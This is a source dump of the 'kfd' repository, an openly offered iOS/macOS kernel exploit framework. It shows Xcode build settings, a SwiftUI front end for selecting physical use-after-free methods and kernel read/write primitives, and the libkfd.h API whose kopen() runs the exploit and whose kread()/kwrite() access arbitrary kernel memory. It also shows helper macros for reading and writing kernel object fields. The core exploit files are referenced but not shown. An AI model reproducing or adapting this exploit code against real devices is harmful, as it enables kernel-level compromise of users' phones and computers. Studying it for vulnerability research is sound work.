CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 356 | CLANG_WARN_BOOL_CONVERSION = YES; 357 | CLANG_WARN_COMMA = YES; 358 | CLANG_WARN_CONSTANT_CONVERSION = YES; 359 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 360 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 361 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 362 | CLANG_WARN_EMPTY_BODY = YES; 363 | CLANG_WARN_ENUM_CONVERSION = YES; 364 | CLANG_WARN_INFINITE_RECURSION = YES; 365 | CLANG_WARN_INT_CONVERSION = YES; 366 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 367 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 368 | 
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 369 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 370 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 371 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 372 | CLANG_WARN_STRICT_PROTOTYPES = YES; 373 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 374 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 375 | CLANG_WARN_UNREACHABLE_CODE = YES; 376 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 377 | COPY_PHASE_STRIP = NO; 378 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 379 | ENABLE_NS_ASSERTIONS = NO; 380 | ENABLE_STRICT_OBJC_MSGSEND = YES; 381 | GCC_C_LANGUAGE_STANDARD = gnu11; 382 | GCC_NO_COMMON_BLOCKS = YES; 383 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 384 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 385 | GCC_WARN_UNDECLARED_SELECTOR = YES; 386 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 387 | GCC_WARN_UNUSED_FUNCTION = YES; 388 | GCC_WARN_UNUSED_VARIABLE = YES; 389 | MTL_ENABLE_DEBUG_INFO = NO; 390 | MTL_FAST_MATH = YES; 391 | SWIFT_COMPILATION_MODE = wholemodule; 392 | SWIFT_OPTIMIZATION_LEVEL = "-O"; 393 | }; 394 | name = Release; 395 | }; 396 | 297BA1152A310AE200D1E51A /* Debug */ = { 397 | isa = XCBuildConfiguration; 398 | buildSettings = { 399 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 400 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 401 | CLANG_ENABLE_MODULES = YES; 402 | CODE_SIGN_ENTITLEMENTS = kfd/kfd.entitlements; 403 | CODE_SIGN_STYLE = Automatic; 404 | CURRENT_PROJECT_VERSION = 1; 405 | DEVELOPMENT_ASSET_PATHS = "\"kfd/Preview Content\""; 406 | DEVELOPMENT_TEAM = 4YW3B9LRX5; 407 | ENABLE_HARDENED_RUNTIME = YES; 408 | ENABLE_PREVIEWS = YES; 409 | GENERATE_INFOPLIST_FILE = YES; 410 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphoneos*]" = YES; 411 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphonesimulator*]" = YES; 412 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphoneos*]" = YES; 413 | 
"INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphonesimulator*]" = YES; 414 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphoneos*]" = YES; 415 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphonesimulator*]" = YES; 416 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphoneos*]" = UIStatusBarStyleDefault; 417 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphonesimulator*]" = UIStatusBarStyleDefault; 418 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 419 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 420 | IPHONEOS_DEPLOYMENT_TARGET = 16.4; 421 | LD_RUNPATH_SEARCH_PATHS = "@executable_path/Frameworks"; 422 | "LD_RUNPATH_SEARCH_PATHS[sdk=macosx*]" = "@executable_path/../Frameworks"; 423 | MACOSX_DEPLOYMENT_TARGET = 13.3; 424 | MARKETING_VERSION = 1.0; 425 | PRODUCT_BUNDLE_IDENTIFIER = com.p0up0u.kfd; 426 | PRODUCT_NAME = "$(TARGET_NAME)"; 427 | SDKROOT = auto; 428 | SUPPORTED_PLATFORMS = "iphoneos iphonesimulator macosx"; 429 | SWIFT_EMIT_LOC_STRINGS = YES; 430 | SWIFT_OBJC_BRIDGING_HEADER = "kfd/kfd-Bridging-Header.h"; 431 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 432 | SWIFT_VERSION = 5.0; 433 | TARGETED_DEVICE_FAMILY = "1,2"; 434 | }; 435 | name = Debug; 436 | }; 437 | 297BA1162A310AE200D1E51A /* Release */ = { 438 | isa = XCBuildConfiguration; 439 | buildSettings = { 440 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 441 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 442 | CLANG_ENABLE_MODULES = YES; 443 | CODE_SIGN_ENTITLEMENTS = kfd/kfd.entitlements; 444 | CODE_SIGN_STYLE = Automatic; 445 | CURRENT_PROJECT_VERSION = 1; 446 | DEVELOPMENT_ASSET_PATHS = "\"kfd/Preview Content\""; 447 | DEVELOPMENT_TEAM = 4YW3B9LRX5; 448 | ENABLE_HARDENED_RUNTIME = YES; 449 | ENABLE_PREVIEWS = YES; 
450 | GENERATE_INFOPLIST_FILE = YES; 451 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphoneos*]" = YES; 452 | "INFOPLIST_KEY_UIApplicationSceneManifest_Generation[sdk=iphonesimulator*]" = YES; 453 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphoneos*]" = YES; 454 | "INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents[sdk=iphonesimulator*]" = YES; 455 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphoneos*]" = YES; 456 | "INFOPLIST_KEY_UILaunchScreen_Generation[sdk=iphonesimulator*]" = YES; 457 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphoneos*]" = UIStatusBarStyleDefault; 458 | "INFOPLIST_KEY_UIStatusBarStyle[sdk=iphonesimulator*]" = UIStatusBarStyleDefault; 459 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 460 | INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; 461 | IPHONEOS_DEPLOYMENT_TARGET = 16.4; 462 | LD_RUNPATH_SEARCH_PATHS = "@executable_path/Frameworks"; 463 | "LD_RUNPATH_SEARCH_PATHS[sdk=macosx*]" = "@executable_path/../Frameworks"; 464 | MACOSX_DEPLOYMENT_TARGET = 13.3; 465 | MARKETING_VERSION = 1.0; 466 | PRODUCT_BUNDLE_IDENTIFIER = com.p0up0u.kfd; 467 | PRODUCT_NAME = "$(TARGET_NAME)"; 468 | SDKROOT = auto; 469 | SUPPORTED_PLATFORMS = "iphoneos iphonesimulator macosx"; 470 | SWIFT_EMIT_LOC_STRINGS = YES; 471 | SWIFT_OBJC_BRIDGING_HEADER = "kfd/kfd-Bridging-Header.h"; 472 | SWIFT_VERSION = 5.0; 473 | TARGETED_DEVICE_FAMILY = "1,2"; 474 | }; 475 | name = Release; 476 | }; 477 | /* End XCBuildConfiguration section */ 478 | 479 | /* Begin XCConfigurationList section */ 480 | 297BA1002A310AE100D1E51A /* Build configuration list for PBXProject "kfd" */ = { 481 | isa = XCConfigurationList; 482 | buildConfigurations = ( 483 | 297BA1122A310AE200D1E51A /* Debug 
*/, 484 | 297BA1132A310AE200D1E51A /* Release */, 485 | ); 486 | defaultConfigurationIsVisible = 0; 487 | defaultConfigurationName = Release; 488 | }; 489 | 297BA1142A310AE200D1E51A /* Build configuration list for PBXNativeTarget "kfd" */ = { 490 | isa = XCConfigurationList; 491 | buildConfigurations = ( 492 | 297BA1152A310AE200D1E51A /* Debug */, 493 | 297BA1162A310AE200D1E51A /* Release */, 494 | ); 495 | defaultConfigurationIsVisible = 0; 496 | defaultConfigurationName = Release; 497 | }; 498 | /* End XCConfigurationList section */ 499 | }; 500 | rootObject = 297BA0FD2A310AE100D1E51A /* Project object */; 501 | } 502 | -------------------------------------------------------------------------------- /kfd.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /kfd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /kfd/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "idiom" : "universal" 5 | } 6 | ], 7 | "info" : { 8 | "author" : "xcode", 9 | "version" : 1 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /kfd/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "platform" : "ios", 6 | "size" : "1024x1024" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "scale" : "1x", 11 | "size" : "16x16" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "scale" : "2x", 
16 | "size" : "16x16" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "scale" : "1x", 21 | "size" : "32x32" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "scale" : "2x", 26 | "size" : "32x32" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "scale" : "1x", 31 | "size" : "128x128" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "scale" : "2x", 36 | "size" : "128x128" 37 | }, 38 | { 39 | "idiom" : "mac", 40 | "scale" : "1x", 41 | "size" : "256x256" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "scale" : "2x", 46 | "size" : "256x256" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "scale" : "1x", 51 | "size" : "512x512" 52 | }, 53 | { 54 | "idiom" : "mac", 55 | "scale" : "2x", 56 | "size" : "512x512" 57 | } 58 | ], 59 | "info" : { 60 | "author" : "xcode", 61 | "version" : 1 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /kfd/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /kfd/ContentView.swift: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

import SwiftUI

/// Front end for libkfd: lets the user pick the number of PUAF pages, the PUAF
/// method, and the kread/kwrite primitives, then drives the bridged C API
/// `kopen()` / `kclose()` (declared in libkfd.h via the bridging header).
struct ContentView: View {
    /// Opaque handle returned by `kopen()`; 0 means the exploit is not running.
    /// All pickers and the "kopen" button are disabled while it is non-zero.
    @State private var kfd: UInt64 = 0

    // Fix: the option tables below were declared `private var` but are never
    // mutated — `let` is the correct binding and silences the compiler warning.
    private let puaf_pages_options = [16, 32, 64, 128, 256, 512, 1024, 2048]
    /// Index into `puaf_pages_options`; default 7 selects 2048 pages.
    @State private var puaf_pages_index = 7
    @State private var puaf_pages = 0

    /// Order must match `enum puaf_method` in libkfd.h; default 1 = "smith".
    private let puaf_method_options = ["physpuppet", "smith"]
    @State private var puaf_method = 1

    /// Order must match `enum kread_method` in libkfd.h; default 1 = "sem_open".
    private let kread_method_options = ["kqueue_workloop_ctl", "sem_open"]
    @State private var kread_method = 1

    /// Order must match `enum kwrite_method` in libkfd.h; default 1 = "sem_open".
    private let kwrite_method_options = ["dup", "sem_open"]
    @State private var kwrite_method = 1

    var body: some View {
        NavigationView {
            Form {
                Section {
                    Picker(selection: $puaf_pages_index, label: Text("puaf pages:")) {
                        ForEach(0 ..< puaf_pages_options.count, id: \.self) {
                            Text(String(self.puaf_pages_options[$0]))
                        }
                    }.disabled(kfd != 0)
                }
                Section {
                    Picker(selection: $puaf_method, label: Text("puaf method:")) {
                        ForEach(0 ..< puaf_method_options.count, id: \.self) {
                            Text(self.puaf_method_options[$0])
                        }
                    }.disabled(kfd != 0)
                }
                Section {
                    Picker(selection: $kread_method, label: Text("kread method:")) {
                        ForEach(0 ..< kread_method_options.count, id: \.self) {
                            Text(self.kread_method_options[$0])
                        }
                    }.disabled(kfd != 0)
                }
                Section {
                    Picker(selection: $kwrite_method, label: Text("kwrite method:")) {
                        ForEach(0 ..< kwrite_method_options.count, id: \.self) {
                            Text(self.kwrite_method_options[$0])
                        }
                    }.disabled(kfd != 0)
                }
                Section {
                    HStack {
                        // Selected indexes are passed straight through as the C
                        // enum raw values expected by kopen().
                        Button("kopen") {
                            puaf_pages = puaf_pages_options[puaf_pages_index]
                            kfd = kopen(UInt64(puaf_pages), UInt64(puaf_method), UInt64(kread_method), UInt64(kwrite_method))
                        }.disabled(kfd != 0).frame(minWidth: 0, maxWidth: .infinity)
                        Button("kclose") {
                            kclose(kfd)
                            puaf_pages = 0
                            kfd = 0
                        }.disabled(kfd == 0).frame(minWidth: 0, maxWidth: .infinity)
                    }.buttonStyle(.bordered)
                }.listRowBackground(Color.clear)
                // Diagnostic output goes to stdout, hence "Look at output in Xcode".
                if kfd != 0 {
                    Section {
                        VStack {
                            Text("Success!").foregroundColor(.green)
                            Text("Look at output in Xcode")
                        }.frame(minWidth: 0, maxWidth: .infinity)
                    }.listRowBackground(Color.clear)
                }
            }.navigationBarTitle(Text("kfd"), displayMode: .inline)
        }
    }
}

struct ContentView_Previews: PreviewProvider {
    static var previews: some View {
        ContentView()
    }
}
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef libkfd_h
#define libkfd_h

/*
 * The global configuration parameters of libkfd.
 */
#define CONFIG_ASSERT 1 // enable the assert()/assert_bsd()/assert_mach() macros in common.h
#define CONFIG_PRINT 1  // enable the print_*() diagnostic macros in common.h
#define CONFIG_TIMER 1  // enable timer_start()/timer_end() around kopen() phases

#include "libkfd/common.h"

/*
 * The public API of libkfd.
 */

// Physical use-after-free strategy. The enumerator order must match the
// "puaf method" picker in ContentView.swift, which passes the raw index.
enum puaf_method {
    puaf_physpuppet,
    puaf_smith,
};

// Kernel-read primitive used after the PUAF; order must match the UI picker.
enum kread_method {
    kread_kqueue_workloop_ctl,
    kread_sem_open,
};

// Kernel-write primitive used after the PUAF; order must match the UI picker.
enum kwrite_method {
    kwrite_dup,
    kwrite_sem_open,
};

// Runs the full exploit and returns an opaque handle (actually a pointer to a
// heap-allocated "struct kfd", cast to u64) to pass to kread/kwrite/kclose.
u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method);
// Copies "size" bytes from kernel address "kaddr" into user buffer "uaddr".
void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size);
// Copies "size" bytes from user buffer "uaddr" to kernel address "kaddr".
void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size);
// Tears down the exploit state and frees the handle returned by kopen().
void kclose(u64 kfd);

/*
 * The private API of libkfd.
 */

struct kfd; // Forward declaration for function pointers.
46 | 47 | struct info { 48 | struct { 49 | vm_address_t src_uaddr; 50 | vm_address_t dst_uaddr; 51 | vm_size_t size; 52 | } copy; 53 | struct { 54 | i32 pid; 55 | u64 tid; 56 | u64 vid; 57 | bool ios; 58 | char osversion[8]; 59 | u64 maxfilesperproc; 60 | } env; 61 | struct { 62 | u64 current_map; 63 | u64 current_pmap; 64 | u64 current_proc; 65 | u64 current_task; 66 | u64 current_thread; 67 | u64 current_uthread; 68 | u64 kernel_map; 69 | u64 kernel_pmap; 70 | u64 kernel_proc; 71 | u64 kernel_task; 72 | } kaddr; 73 | }; 74 | 75 | struct perf { 76 | u64 kernelcache_index; 77 | u64 kernel_slide; 78 | u64 gVirtBase; 79 | u64 gPhysBase; 80 | u64 gPhysSize; 81 | struct { 82 | u64 pa; 83 | u64 va; 84 | } ttbr[2]; 85 | struct ptov_table_entry { 86 | u64 pa; 87 | u64 va; 88 | u64 len; 89 | } ptov_table[8]; 90 | struct { 91 | u64 kaddr; 92 | u64 paddr; 93 | u64 uaddr; 94 | u64 size; 95 | } shared_page; 96 | struct { 97 | i32 fd; 98 | u32 si_rdev_buffer[2]; 99 | u64 si_rdev_kaddr; 100 | } dev; 101 | void (*saved_kread)(struct kfd*, u64, void*, u64); 102 | void (*saved_kwrite)(struct kfd*, void*, u64, u64); 103 | }; 104 | 105 | struct puaf { 106 | u64 number_of_puaf_pages; 107 | u64* puaf_pages_uaddr; 108 | void* puaf_method_data; 109 | u64 puaf_method_data_size; 110 | struct { 111 | void (*init)(struct kfd*); 112 | void (*run)(struct kfd*); 113 | void (*cleanup)(struct kfd*); 114 | void (*free)(struct kfd*); 115 | } puaf_method_ops; 116 | }; 117 | 118 | struct krkw { 119 | u64 krkw_maximum_id; 120 | u64 krkw_allocated_id; 121 | u64 krkw_searched_id; 122 | u64 krkw_object_id; 123 | u64 krkw_object_uaddr; 124 | u64 krkw_object_size; 125 | void* krkw_method_data; 126 | u64 krkw_method_data_size; 127 | struct { 128 | void (*init)(struct kfd*); 129 | void (*allocate)(struct kfd*, u64); 130 | bool (*search)(struct kfd*, u64); 131 | void (*kread)(struct kfd*, u64, void*, u64); 132 | void (*kwrite)(struct kfd*, void*, u64, u64); 133 | void (*find_proc)(struct kfd*); 134 | void 
(*deallocate)(struct kfd*, u64); 135 | void (*free)(struct kfd*); 136 | } krkw_method_ops; 137 | }; 138 | 139 | struct kfd { 140 | struct info info; 141 | struct perf perf; 142 | struct puaf puaf; 143 | struct krkw kread; 144 | struct krkw kwrite; 145 | }; 146 | 147 | #include "libkfd/info.h" 148 | #include "libkfd/puaf.h" 149 | #include "libkfd/krkw.h" 150 | #include "libkfd/perf.h" 151 | 152 | struct kfd* kfd_init(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) 153 | { 154 | struct kfd* kfd = (struct kfd*)(malloc_bzero(sizeof(struct kfd))); 155 | info_init(kfd); 156 | puaf_init(kfd, puaf_pages, puaf_method); 157 | krkw_init(kfd, kread_method, kwrite_method); 158 | perf_init(kfd); 159 | return kfd; 160 | } 161 | 162 | void kfd_free(struct kfd* kfd) 163 | { 164 | perf_free(kfd); 165 | krkw_free(kfd); 166 | puaf_free(kfd); 167 | info_free(kfd); 168 | bzero_free(kfd, sizeof(struct kfd)); 169 | } 170 | 171 | u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) 172 | { 173 | timer_start(); 174 | 175 | const u64 puaf_pages_min = 16; 176 | const u64 puaf_pages_max = 2048; 177 | assert(puaf_pages >= puaf_pages_min); 178 | assert(puaf_pages <= puaf_pages_max); 179 | assert(puaf_method <= puaf_smith); 180 | assert(kread_method <= kread_sem_open); 181 | assert(kwrite_method <= kwrite_sem_open); 182 | 183 | struct kfd* kfd = kfd_init(puaf_pages, puaf_method, kread_method, kwrite_method); 184 | puaf_run(kfd); 185 | krkw_run(kfd); 186 | info_run(kfd); 187 | perf_run(kfd); 188 | puaf_cleanup(kfd); 189 | 190 | timer_end(); 191 | return (u64)(kfd); 192 | } 193 | 194 | void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size) 195 | { 196 | krkw_kread((struct kfd*)(kfd), kaddr, uaddr, size); 197 | } 198 | 199 | void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size) 200 | { 201 | krkw_kwrite((struct kfd*)(kfd), uaddr, kaddr, size); 202 | } 203 | 204 | void kclose(u64 kfd) 205 | { 206 | kfd_free((struct kfd*)(kfd)); 207 | } 208 | 209 | 
#endif /* libkfd_h */ 210 | -------------------------------------------------------------------------------- /kfd/libkfd/common.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef common_h 6 | #define common_h 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define pages(number_of_pages) ((number_of_pages) * (16384ull)) 23 | 24 | #define min(a, b) (((a) < (b)) ? (a) : (b)) 25 | #define max(a, b) (((a) > (b)) ? (a) : (b)) 26 | 27 | typedef int8_t i8; 28 | typedef int16_t i16; 29 | typedef int32_t i32; 30 | typedef int64_t i64; 31 | typedef intptr_t isize; 32 | 33 | typedef uint8_t u8; 34 | typedef uint16_t u16; 35 | typedef uint32_t u32; 36 | typedef uint64_t u64; 37 | typedef uintptr_t usize; 38 | 39 | /* 40 | * Helper print macros. 41 | */ 42 | 43 | #if CONFIG_PRINT 44 | 45 | #define print(args...) printf(args) 46 | 47 | #else /* CONFIG_PRINT */ 48 | 49 | #define print(args...) 50 | 51 | #endif /* CONFIG_PRINT */ 52 | 53 | #define print_bool(name) print("[%s]: %s = %s\n", __FUNCTION__, #name, name ? 
"true" : "false") 54 | 55 | #define print_i8(name) print("[%s]: %s = %hhi\n", __FUNCTION__, #name, name) 56 | #define print_u8(name) print("[%s]: %s = %hhu\n", __FUNCTION__, #name, name) 57 | #define print_x8(name) print("[%s]: %s = %02hhx\n", __FUNCTION__, #name, name) 58 | 59 | #define print_i16(name) print("[%s]: %s = %hi\n", __FUNCTION__, #name, name) 60 | #define print_u16(name) print("[%s]: %s = %hu\n", __FUNCTION__, #name, name) 61 | #define print_x16(name) print("[%s]: %s = %04hx\n", __FUNCTION__, #name, name) 62 | 63 | #define print_i32(name) print("[%s]: %s = %i\n", __FUNCTION__, #name, name) 64 | #define print_u32(name) print("[%s]: %s = %u\n", __FUNCTION__, #name, name) 65 | #define print_x32(name) print("[%s]: %s = %08x\n", __FUNCTION__, #name, name) 66 | 67 | #define print_i64(name) print("[%s]: %s = %lli\n", __FUNCTION__, #name, name) 68 | #define print_u64(name) print("[%s]: %s = %llu\n", __FUNCTION__, #name, name) 69 | #define print_x64(name) print("[%s]: %s = %016llx\n", __FUNCTION__, #name, name) 70 | 71 | #define print_isize(name) print("[%s]: %s = %li\n", __FUNCTION__, #name, name) 72 | #define print_usize(name) print("[%s]: %s = %lu\n", __FUNCTION__, #name, name) 73 | #define print_xsize(name) print("[%s]: %s = %016lx\n", __FUNCTION__, #name, name) 74 | 75 | #define print_string(name) print("[%s]: %s = %s\n", __FUNCTION__, #name, name) 76 | 77 | #define print_message(args...) do { print("[%s]: ", __FUNCTION__); print(args); print("\n"); } while (0) 78 | #define print_success(args...) do { print("[%s]: 🟢 ", __FUNCTION__); print(args); print("\n"); } while (0) 79 | #define print_warning(args...) do { print("[%s]: 🟡 ", __FUNCTION__); print(args); print("\n"); } while (0) 80 | #define print_failure(args...) 
do { print("[%s]: 🔴 ", __FUNCTION__); print(args); print("\n"); } while (0) 81 | 82 | #define print_timer(tv) \ 83 | do { \ 84 | u64 sec = ((tv)->tv_sec); \ 85 | u64 msec = ((tv)->tv_usec) / 1000; \ 86 | u64 usec = ((tv)->tv_usec) % 1000; \ 87 | print_success("%llus %llums %lluus", sec, msec, usec); \ 88 | } while (0) 89 | 90 | #define print_buffer(uaddr, size) \ 91 | do { \ 92 | const u64 u64_per_line = 8; \ 93 | volatile u64* u64_base = (volatile u64*)(uaddr); \ 94 | u64 u64_size = ((u64)(size) / sizeof(u64)); \ 95 | for (u64 u64_offset = 0; u64_offset < u64_size; u64_offset++) { \ 96 | if ((u64_offset % u64_per_line) == 0) { \ 97 | print("[0x%04llx]: ", u64_offset * sizeof(u64)); \ 98 | } \ 99 | print("%016llx", u64_base[u64_offset]); \ 100 | if ((u64_offset % u64_per_line) == (u64_per_line - 1)) { \ 101 | print("\n"); \ 102 | } else { \ 103 | print(" "); \ 104 | } \ 105 | } \ 106 | if ((u64_size % u64_per_line) != 0) { \ 107 | print("\n"); \ 108 | } \ 109 | } while (0) 110 | 111 | /* 112 | * Helper assert macros. 113 | */ 114 | 115 | #if CONFIG_ASSERT 116 | 117 | #define assert(condition) \ 118 | do { \ 119 | if (!(condition)) { \ 120 | print_failure("assertion failed: (%s)", #condition); \ 121 | print_failure("file: %s, line: %d", __FILE__, __LINE__); \ 122 | print_failure("... 
sleep(30) before exit(1) ..."); \ 123 | sleep(30); \ 124 | exit(1); \ 125 | } \ 126 | } while (0) 127 | 128 | #else /* CONFIG_ASSERT */ 129 | 130 | #define assert(condition) 131 | 132 | #endif /* CONFIG_ASSERT */ 133 | 134 | #define assert_false(message) \ 135 | do { \ 136 | print_failure("error: %s", message); \ 137 | assert(false); \ 138 | } while (0) 139 | 140 | #define assert_bsd(statement) \ 141 | do { \ 142 | kern_return_t kret = (statement); \ 143 | if (kret != KERN_SUCCESS) { \ 144 | print_failure("bsd error: kret = %d, errno = %d (%s)", kret, errno, strerror(errno)); \ 145 | assert(kret == KERN_SUCCESS); \ 146 | } \ 147 | } while (0) 148 | 149 | #define assert_mach(statement) \ 150 | do { \ 151 | kern_return_t kret = (statement); \ 152 | if (kret != KERN_SUCCESS) { \ 153 | print_failure("mach error: kret = %d (%s)", kret, mach_error_string(kret)); \ 154 | assert(kret == KERN_SUCCESS); \ 155 | } \ 156 | } while (0) 157 | 158 | /* 159 | * Helper timer macros. 160 | */ 161 | 162 | #if CONFIG_TIMER 163 | 164 | #define timer_start() \ 165 | struct timeval tv_start; \ 166 | do { \ 167 | assert_bsd(gettimeofday(&tv_start, NULL)); \ 168 | } while (0) 169 | 170 | #define timer_end() \ 171 | do { \ 172 | struct timeval tv_end, tv_diff; \ 173 | assert_bsd(gettimeofday(&tv_end, NULL)); \ 174 | timersub(&tv_end, &tv_start, &tv_diff); \ 175 | print_timer(&tv_diff); \ 176 | } while (0) 177 | 178 | #else /* CONFIG_TIMER */ 179 | 180 | #define timer_start() 181 | #define timer_end() 182 | 183 | #endif /* CONFIG_TIMER */ 184 | 185 | /* 186 | * Helper allocation macros. 
187 | */ 188 | 189 | #define malloc_bzero(size) \ 190 | ({ \ 191 | void* pointer = malloc(size); \ 192 | assert(pointer != NULL); \ 193 | bzero(pointer, size); \ 194 | pointer; \ 195 | }) 196 | 197 | #define bzero_free(pointer, size) \ 198 | do { \ 199 | bzero(pointer, size); \ 200 | free(pointer); \ 201 | pointer = NULL; \ 202 | } while (0) 203 | 204 | #endif /* common_h */ 205 | -------------------------------------------------------------------------------- /kfd/libkfd/info.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef info_h 6 | #define info_h 7 | 8 | /* 9 | * Helper macros for dynamic types. 10 | */ 11 | 12 | #define dynamic_sizeof(object) (object##_versions[kfd->info.env.vid].object_size) 13 | 14 | #define dynamic_offsetof(object, field) (object##_versions[kfd->info.env.vid].field) 15 | 16 | #define dynamic_uget(object, field, object_uaddr) \ 17 | ({ \ 18 | u64 field_uaddr = (u64)(object_uaddr) + dynamic_offsetof(object, field); \ 19 | object##_##field##_t field_value = *(volatile object##_##field##_t*)(field_uaddr); \ 20 | field_value; \ 21 | }) 22 | 23 | #define dynamic_uset(object, field, object_uaddr, field_value) \ 24 | do { \ 25 | u64 field_uaddr = (u64)(object_uaddr) + dynamic_offsetof(object, field); \ 26 | *(volatile object##_##field##_t*)(field_uaddr) = (object##_##field##_t)(field_value); \ 27 | } while (0) 28 | 29 | #define dynamic_kget(object, field, object_kaddr) \ 30 | ({ \ 31 | u64 buffer = 0; \ 32 | u64 field_kaddr = (u64)(object_kaddr) + dynamic_offsetof(object, field); \ 33 | kread((u64)(kfd), (field_kaddr), (&buffer), (sizeof(buffer))); \ 34 | object##_##field##_t field_value = *(object##_##field##_t*)(&buffer); \ 35 | field_value; \ 36 | }) 37 | 38 | #define dynamic_kset_u64(object, field, object_kaddr, field_value) \ 39 | do { \ 40 | u64 buffer = field_value; \ 41 | u64 field_kaddr = (u64)(object_kaddr) 
// Dynamic types: per-OS-version field offsets, resolved via kfd->info.env.vid.
#include "info/dynamic_types/kqworkloop.h"
#include "info/dynamic_types/proc.h"
#include "info/dynamic_types/task.h"
#include "info/dynamic_types/thread.h"
#include "info/dynamic_types/uthread.h"
#include "info/dynamic_types/vm_map.h"

/*
 * Helper macros for static types.
 *
 * Static types have fixed layouts across the supported OS versions, so plain
 * sizeof/offsetof work. The *_uget/*_uset variants access a kernel object
 * through a userspace mapping (a PUAF page); the *_kget/*_kset variants go
 * through the public kread()/kwrite() API and therefore need a live kfd.
 */

#define static_sizeof(object) (sizeof(struct object))

#define static_offsetof(object, field) (offsetof(struct object, field))

